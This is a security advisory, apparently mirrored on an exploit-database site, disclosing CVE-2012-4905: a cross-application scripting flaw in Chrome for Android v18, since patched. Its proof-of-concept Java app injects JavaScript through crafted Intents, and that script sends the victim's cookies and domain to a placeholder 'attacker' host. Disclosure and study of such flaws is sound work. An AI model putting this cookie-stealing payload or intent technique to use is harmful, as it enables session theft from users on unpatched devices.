Chrome For Android Universal Cross Site Scripting

2013.01.08
Credit: Takeshi Terada
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2012-4905
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

CVE Number: CVE-2012-4905 Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra Affected Software: Confirmed on Chrome for Android v18.0.1025123 Credit: Takeshi Terada Issue Status: v18.0.1025308 was released which fixes this vulnerability Overview: By sending a crafted Intent to Chrome for Android, malicious Android apps can inject javascript into arbitrary Web pages rendered in Chrome. Such kind of UXSS-like vulnerabilities is often called Cross-Application Scripting. Details: When other Android apps send an Intent with javascript: URI to Chrome for Android (v18.0.1025123), Chrome opens a new tab and execute the JavaScript code in the context of the blank domain. Probably this is a countermeasure against UXSS attacks. However, this can be bypassed by an Intent with Extra data as below: intent.putExtra("com.android.browser.application_id", "com.android.chrome"); With an Intent that contains such Extra data, Chrome loads javascript: URI (written in the Intent) in the current foreground tab, not in a blank tab. This enables malicious Android apps to execute arbitrary JavaScript code in arbitrary domains on Chrome. As a result, other apps are able to steal Cookies and so on. Proof of Concept: package jp.mbsd.terada.attackchrome1; import android.app.Activity; import android.os.Bundle; import android.content.Intent; import android.net.Uri; public class Main extends Activity { @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); doit(); } // get intent to invoke the chrome app public Intent getIntentForChrome(String url) { Intent intent = new Intent("android.intent.action.VIEW"); intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main"); intent.setData(Uri.parse(url)); return intent; } public void doit() { try { // At first, force the chrome app to open a target Web page Intent intent1 = getIntentForChrome("http://www.google.com/1"); startActivity(intent1); // wait a few seconds Thread.sleep(3000); // JS code to inject into the target (www.google.com) String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');" + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);" + "document.body.appendChild(img);"; Intent intent2 = getIntentForChrome(jsURL); // Trick to prevent Chrome from opening the JS URL in a different tab intent2.putExtra("com.android.browser.application_id", "com.android.chrome"); intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP); // Inject JS into the target Web page startActivity(intent2); } catch (Exception e) {} } } Timeline: 2012/07/07 Reported to Google security team. 2012/09/12 Vender announced v18.0.1025308 2013/01/07 Disclosure of this advisory Recommendation: Upgrade to the latest version. Reference: http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html https://code.google.com/p/chromium/issues/detail?id=144813

References:

http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144813


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top